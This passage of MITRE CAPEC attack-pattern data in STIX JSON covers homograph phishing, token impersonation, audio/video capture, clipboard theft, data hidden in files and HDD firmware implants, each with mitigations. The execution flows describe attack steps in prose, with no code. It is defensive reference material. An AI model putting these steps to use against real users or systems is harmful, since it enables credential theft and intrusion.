"x_capec_example_instances": [ + "\n An adversary sends an email, impersonating bankofamerica.com to a user stating that they have just received a new deposit 
and to click the given link to confirm the deposit.\n However, the link the in email is bankofamerica.com, where the 'a' and 'e' characters are Cyrillic and not ASCII, instead of bankofamerica.com (all ASCII), which the user clicks after carefully reading the URL, making sure that typosquatting and soundsquatting attacks are not being leveraged against them.\n The user is directed to the adversary's website, which appears as if it is the legitimate bankofamerica.com login page.\n The user thinks they are logging into their account, but have actually just given their bankofamerica.com credentials to the adversary. The adversary can now use the user's legitimate bankofamerica.com credentials to log into the user's account and steal any money which may be in the account.\n Homograph vulnerability allows an adversary to impersonate a trusted domain by leveraging homoglyphs and tricking a user into visiting the malicious website to steal user credentials.See also: CVE-2012-0584 CVE-2009-0652 CVE-2005-0233 CVE-2005-0234 CVE-2005-0235 CVE-2005-0236 CVE-2005-0237 CVE-2005-0238" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

  2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the URL containing the homoglpyh character(s).

  2. Techniques
    Register the Homograph domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the Homograph domain.

  2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the to click on a link leading the user to the malicious domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc79c713-e3ec-414c-8426-5e3cdf4a0f13", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "target_ref": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize browsers that can warn users if URLs contain characters from different character sets.", + "id": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-632-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "target_ref": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2018-04-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.", + "external_references": [ + { + "external_id": "CAPEC-633", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/633.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + } + ], + "id": "attack-pattern--bec2babe-f38d-49ed-a901-4c7dbbe87b1e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Token Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic (By faking the source of data or services, an adversary can cause a target to make incorrect decisions about how to proceed.)", + "Gain Privileges (By impersonating identities that have an increased level of access, an adversary gain privilege that they many not have otherwise had.)", + "Hide Activities (Faking the source of data or services can be used to create a false trail in logs as the target will associated any actions with the impersonated 
identity instead of the adversary.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "This pattern of attack is only applicable when a downstream user leverages tokens to verify identity, and then takes action based on that identity." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary exploits the target system's audio and video functionalities through malware or scheduled tasks. The goal is to capture sensitive information about the target for financial, personal, political, or other gains which is accomplished by collecting communication data between two parties via the use of peripheral devices (e.g. microphones and webcams) or applications with audio and video capabilities (e.g. Skype) on a system.", + "external_references": [ + { + "external_id": "CAPEC-634", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/634.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Audio Capture", + "external_id": "T1123", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1123" + }, + { + "description": "Video Capture", + "external_id": "T1125", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1125" + }, + { + "description": "Amrita Mitra, What is Car Whisperer?, 2017--03---08, The Security Buddy", + "external_id": "REF-653", + "source_name": "reference_from_CAPEC", + "url": "https://www.thesecuritybuddy.com/bluetooth-security/what-is-car-whisperer/" + }, + { + "description": "What is Bluesnarfing?, 2017--03---13, Finjan Mobile", + "external_id": "REF-654", + "source_name": "reference_from_CAPEC", + "url": 
"https://www.finjanmobile.com/what-is-bluesnarfing/" + } + ], + "id": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Probe Audio and Video Peripherals", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "An adversary can capture audio and video, and transmit the recordings to a C2 server or a similar capability.", + "An adversary can capture and record from audio peripherals in a vehicle via a Car Whisperer attack. If an adversary is within close proximity to a vehicle with Bluetooth capabilities, they may attempt to connect to the hands-free system when it is in pairing mode. With successful authentication, if an authentication system is present at all, an adversary may be able to play music/voice recordings, as well begin a recording and capture conversations happening inside the vehicle. Successful authentication relies on the pairing security key being set to a default value, or by brute force (which may be less practical in an outside environment) Depending on the sensitivity of the information being discussed, this scenario can be extremely compromising.", + "An adversary may also use a technique called Bluebugging, which is similar to Bluesnarfing but requires the adversary to be between 10-15 meters of the target device. Bluebugging creates a backdoor for an attacker to listen/record phone calls, forward calls, send SMS and retrieve the phonebook." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Knowledge of the target device's or application’s vulnerabilities that can be capitalized on with malicious code. The adversary must be able to place the malicious code on the target device." + ], + "x_capec_skills_required": { + "High": "To deploy a hidden process or malware on the system to automatically collect audio and video data." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown code from executing on a system through the use of an allowlist policy.", + "id": "course-of-action--d2376771-bf07-4a50-828d-05fdda76a87f", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-634-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbf046fa-0379-4600-9440-4e02b4dba1f4", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2376771-bf07-4a50-828d-05fdda76a87f", + "target_ref": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Patch installed applications as soon as new updates become available.", + "id": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-634-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4780d621-4627-424b-903c-3f4d714d86a1", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "target_ref": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The extension of a file name is often used in various contexts to determine the application that is used to open and use it. If an attacker can cause an alternative application to be used, it may be able to execute malicious code, cause a denial of service or expose sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-635", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/635.html" + }, + { + "external_id": "CWE-162", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/162.html" + }, + { + "description": "Masquerading: Double File Extension", + "external_id": "T1036.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/007" + } + ], + "id": "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Alternative Execution Due to Deceptive Filenames", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_domains": 
[ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70" + ], + "x_capec_prerequisites": [ + "The use of the file must be controlled by the file extension." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Applications should insure that the content of the file is consistent with format it is expecting, and not depend solely on the file extension.", + "id": "course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-635-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d2c9b192-26b4-46a5-a6c9-aca496c5e896", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12", + "target_ref": "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. 
It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.", + "external_references": [ + { + "external_id": "CAPEC-636", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/636.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Data Obfuscation: Steganography", + "external_id": "T1001.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1001/002" + }, + { + "description": "Obfuscated Files or Information: Steganography", + "external_id": "T1027.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/003" + }, + { + "description": "Obfuscated Files or Information: Compile After Delivery", + "external_id": "T1027.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/004" + }, + { + "description": "Signed Binary Proxy Execution: Compiled HTML File", + "external_id": "T1218.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1218/001" + }, + { + "description": "Template Injection", + "external_id": "T1221", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1221" + }, + { + "description": "Means, Ryan L., Alternate Data Streams: Out of the Shadows and into the Light, SANS Institute", + "external_id": "REF-493", + "source_name": "reference_from_CAPEC", + "url": "https://www.giac.org/paper/gcwn/230/alternate-data-streams-shadows-light/104234" + } + ], + "id": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Hiding Malicious Data or Code within Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + 
"attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87" + ], + "x_capec_prerequisites": [ + "The operating system must support a file system that allows for alternate data storage for a file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Many tools are available to search for the hidden data. Scan regularly for such data using one of these tools.", + "id": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-636-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "target_ref": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary exploits an application that allows for the copying of sensitive data or information by collecting information copied to the clipboard. 
Data copied to the clipboard can be accessed by other applications, such as malware built to exfiltrate or log clipboard contents on a periodic basis. In this way, the adversary aims to garner information to which they are unauthorized.", + "external_references": [ + { + "external_id": "CAPEC-637", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/637.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Clipboard Data", + "external_id": "T1115", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1115" + } + ], + "id": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Collect Data from Clipboard", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an application that allows copying sensititve data to clipboad: An adversary first needs to find an application that allows copying and pasting of sensitive information. This could be an application that prints out temporary passwords to the screen, private email addresses, or any other sensitive information or data

Experiment

  1. Target users of the application: An adversary will target users of the application in order to obtain the information in their clipboard on a periodic basic

  2. Techniques
    Install malware on a user's system designed to log clipboard contents periodically
    Get the user to click on a malicious link that will bring them to an application to log the contents of the clipboard

Exploit

  1. Follow-up attack: Use any sensitive information found to carry out a follow-up attack

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have a means (i.e., a pre-installed tool or background process) by which to collect data from the clipboard and store it. That is, when the target copies data to the clipboard (e.g., to paste into another application), the adversary needs some means of capturing that data in a third location." + ], + "x_capec_skills_required": { + "High": "To deploy a hidden process or malware on the system to automatically collect clipboard data." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While copying and pasting of data with the clipboard is a legitimate and practical function, certain situations and context may require the disabling of this feature. Just as certain applications disable screenshot capability, applications that handle highly sensitive information should consider disabling copy and paste functionality.", + "id": "course-of-action--59dd4ce4-6777-41cd-ae1f-56718a9b85a1", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-637-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca571029-201a-4dbc-aaa9-e3179a745f60", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59dd4ce4-6777-41cd-ae1f-56718a9b85a1", + "target_ref": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust identification and audit/blocking via using an allowlist of applications on your system. Malware may contain the functionality associated with this attack pattern.", + "id": "course-of-action--2d0dcdc8-f803-406a-8cd3-f6e1207c9ed7", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-637-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--19f949ab-5e38-4bef-be5d-dcdcfbc6b2eb", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2d0dcdc8-f803-406a-8cd3-f6e1207c9ed7", + "target_ref": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits systems features and/or improperly protected firmware of hardware components, such as Hard Disk Drives (HDD), with the goal of executing malicious code from within the component's Master Boot Record (MBR). Conducting this type of attack entails the adversary infecting the target with firmware altering malware, using known tools, and a payload. Once this malware is executed, the MBR is modified to include instructions to execute the payload at desired intervals and when the system is booted up. 
A successful attack will obtain persistence within the victim system even if the operating system is reinstalled and/or if the component is formatted or has its data erased.", + "external_references": [ + { + "external_id": "CAPEC-638", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/638.html" + }, + { + "description": "Pre-OS Boot:Component Firmware", + "external_id": "T1542.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/002" + }, + { + "description": "EQUATION GROUP: QUESTIONS AND ANSWERS (1.5), 2015--02, Kaspersky Lab HQ", + "external_id": "REF-664", + "source_name": "reference_from_CAPEC", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + }, + { + "description": "Preston Hood, Hard Drive Firmware Implant IRATEMONK, 2014--10---26, PJHoodsCo Blog", + "external_id": "REF-665", + "source_name": "reference_from_CAPEC", + "url": "https://blog.pjhoodsco.org/hard-drive-firmware-implant-iratemonk/" + }, + { + "description": "Bruce Schneier, IRATEMONK: NSA Exploit of the Day, 2014--01---31, Schneier on Security", + "external_id": "REF-666", + "source_name": "reference_from_CAPEC", + "url": "https://www.schneier.com/blog/archives/2014/01/iratemonk_nsa_e.html" + } + ], + "id": "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Altered Component Firmware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data", + "Modify Data" + ], + "Authentication": [ + "Gain Privileges", + "Execute Unauthorized Commands", + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Gain Privileges", + 
"Execute Unauthorized Commands", + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In 2014, the Equation group was observed levering known malware tools to conduct component firmware alteration attacks against hard drives. In total, 12 HDD categories were shown to be vulnerable from manufacturers such as Western Digital, HGST, Samsung, and Seagate. Because of their complexity, only a few victims were targeted by these attacks. [REF-664]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Select Target: The adversary searches for a suitable target to attack, such as government and/or private industry organizations.

  2. Techniques
    Conduct reconnaissance to determine potential targets to exploit.
  3. Identify Components: After selecting a target, the adversary determines whether a vulnerable component, such as a specific make and model of a HDD, is contained within the target system.

  4. Techniques
    [Remote Access Vector] The adversary gains remote access to the target, typically via additional malware, and explores the system to determine hardware components that are being leveraged.
    [Physical Access Vector] The adversary intercepts components in transit and determines if the component is vulnerable to attack.

Experiment

  1. Optional: Create Payload: If not using an already existing payload, the adversary creates their own to be executed at defined intervals and upon system boot processes. This payload may then be tested on the target system or a test system to confirm its functionality.

Exploit

  1. Insert Firmware Altering Malware: Once a vulnerable component has been identified, the adversary leverages known malware tools to infect the component's firmware and drop the payload within the component's MBR. This allows the adversary to maintain persistence on the target and execute the payload without being detected.

  2. Techniques
    The adversary inserts the firmware altering malware on the target component, via the use of known malware tools.
    [Physical Access Vector] The adversary then sends the component to its original intended destination, where it will be installed onto a victim system.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the target component's firmware", + "Advanced knowledge about Master Boot Records (MBR)", + "Advanced knowledge about tools used to insert firmware altering malware.", + "Advanced knowledge about component shipments to the target organization." + ], + "x_capec_resources_required": [ + "Manufacturer source code for hardware components.", + "Malware tools used to insert malware and payload onto target component.", + "Either remote or physical access to the target component." + ], + "x_capec_skills_required": { + "High": "Ability to intercept components in transit.", + "Low": "Ability to leverage known malware tools to infect target system and insert firmware altering malware/payload", + "Medium": "Ability to create malicious payload to be executed from MBR." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage hardware components known to not be susceptible to these types of attacks.", + "id": "course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-638-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6dea11a-edca-4ae2-903f-37ba52f94b7d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c", + "target_ref": "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement hardware RAID infrastructure.", + "id": "course-of-action--e992e312-e11f-4f4a-8e35-0f0e3178301e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-638-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48c6816a-fb7e-4d07-bd6d-26b9d0326f98", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e992e312-e11f-4f4a-8e35-0f0e3178301e", + "target_ref": "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains unauthorized information due to improperly protected files. 
If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-639", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/639.html" + }, + { + "external_id": "CWE-552", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/552.html" + }, + { + "description": "Data from Network Shared Drive", + "external_id": "T1039", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1039" + }, + { + "description": "Unsecured Credentials: Credentials in Files", + "external_id": "T1552.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/001" + }, + { + "description": "Unsecured Credentials: Bash History", + "external_id": "T1552.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/003" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "Unsecured Credentials: Group Policy Preferences", + "external_id": "T1552.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/006" + } + ], + "id": "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e", + "modified": 